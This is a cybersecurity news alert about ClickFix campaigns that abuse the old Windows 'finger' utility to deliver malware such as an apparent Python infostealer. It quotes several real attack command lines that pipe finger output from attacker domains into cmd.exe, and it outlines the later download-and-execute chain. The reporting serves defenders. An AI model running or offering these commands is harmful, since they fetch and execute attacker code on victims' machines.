Menu

  • Alerts
  • Incidents
  • News
  • APTs
  • Cyber Decoded
  • Cyber Hygiene
  • Cyber Review
  • Cyber Tips
  • Definitions
  • Malware
  • Threat Actors
  • Tutorials

Useful Tools

  • Password generator
  • Report an incident
  • Report to authorities
No Result
View All Result
CTF Hack Havoc
CyberMaterial
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
Hall of Hacks
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
No Result
View All Result
Hall of Hacks
CyberMaterial
No Result
View All Result
Home Alerts

Old Finger Protocol Used In Malware

November 19, 2025
Reading Time: 3 mins read
in Alerts
Malware Spread Through DNS Rerouting

The decades-old ‘finger’ command, a utility historically used to look up information about users on Unix and Linux systems via the Finger protocol, is experiencing a troubling resurgence. Although the command was later ported to Windows and is still supported, its general use has significantly declined since its popularity decades ago. However, security researchers have noted that threat actors are now leveraging this dormant protocol to execute remote commands on compromised Windows devices.

When executed, the legitimate finger command is designed to return basic details about a user, such as their login name, home directory, and last seen activity. Unfortunately, recent malicious campaigns are utilizing the Finger protocol in what are appearing to be ClickFix attacks. These social engineering schemes prompt the victim to run a seemingly harmless Windows command, which secretly uses the finger utility to retrieve and run commands supplied from a remote server. This is not a completely novel technique; researchers previously warned in 2020 that finger was being used as a Living Off the Land Binary (LOLBIN) to download malware and evade security detection.

A recent example, shared by cybersecurity researcher MalwareHunterTeam, involved a batch file that used the command finger root@finger.nateams[.]com and piped its output through cmd.exe. This method caused the remote server’s response to be executed as local commands. Another highly public example occurred when a person on Reddit detailed how they fell victim to a ClickFix attack impersonating a Captcha verification, which tricked them into running a malicious command. The victim entered a command similar to cmd /c start “” /min cmd /c “finger vke@finger.cloudmega[.]org | cmd”, unknowingly setting the stage for the attack.

The core of this attack is the abuse of the Finger protocol as a remote script delivery method. By piping the output of the finger request directly into the Windows command processor, cmd.exe, the commands supplied by the attacker’s server are executed immediately. In one captured attack, the executed script created a random-named path, copied curl.exe to a random filename, and then used the renamed curl to download a zipped malware package disguised as a PDF. This package was then extracted to run a Python malware program using pythonw.exe.

While the exact nature of all payloads is not fully confirmed, a related batch file suggests that this Python package acts as an infostealer. The final action of the script often involves a call back to the attacker’s server to confirm successful execution, alongside displaying a fake “Verify you are human” prompt to the user to maintain the deception. MalwareHunterTeam has also identified similar campaigns using different domains, such as one employing finger Kove2@api.metrics-strange.com | cmd, indicating this exploitation technique is currently widespread and actively being used by various threat groups.

Reference:

  • Legacy Finger Protocol Exploited To Launch ClickFix Malware Attacks
Tags: Cyber AlertsCyber Alerts 2025CyberattackCybersecurityNovember 2025
ADVERTISEMENT

Related Posts

Malware Spread Through DNS Rerouting

Malware Spread Through DNS Rerouting

November 19, 2025
Malware Spread Through DNS Rerouting

AI Agents Turned Against Each Other

November 19, 2025
Fortinet Flaw Used To Create Admins

Interview Campaign Exploits JSON Storage

November 18, 2025
Fortinet Flaw Used To Create Admins

Iran Hackers Launch SpearSpecter Spying

November 18, 2025
Fortinet Flaw Used To Create Admins

Fortinet Flaw Used To Create Admins

November 18, 2025
Dragon Breath Deploys Roninloader Ghosts

Rondodox Targets XWiki To Grow Botnet

November 17, 2025

Latest Alerts

Old Finger Protocol Used In Malware

Malware Spread Through DNS Rerouting

AI Agents Turned Against Each Other

Interview Campaign Exploits JSON Storage

Iran Hackers Launch SpearSpecter Spying

Fortinet Flaw Used To Create Admins

Subscribe to our newsletter

    Latest Incidents

    France Hit By Major Cyberattack

    Danish Parties Targeted By Cyberattack

    Under Armour Hit By Data Breach

    Princeton Reports Donor Data Breach

    Massive Cloud DDoS Hits Microsoft Azure

    Kenyan Gov Sites Back Online After Hack

    CyberMaterial Logo
    • About Us
    • Contact Us
    • Jobs
    • Legal and Privacy Policy
    • Site Map

    © 2025 | CyberMaterial | All rights reserved

    Welcome Back!

    Login to your account below

    Forgotten Password?

    Retrieve your password

    Please enter your username or email address to reset your password.

    Log In

    Add New Playlist

    No Result
    View All Result
    • Alerts
    • Incidents
    • News
    • Cyber Decoded
    • Cyber Hygiene
    • Cyber Review
    • Definitions
    • Malware
    • Cyber Tips
    • Tutorials
    • Advanced Persistent Threats
    • Threat Actors
    • Report an incident
    • Password Generator
    • About Us
    • Contact Us
    • Advertise with us

    Copyright © 2025 CyberMaterial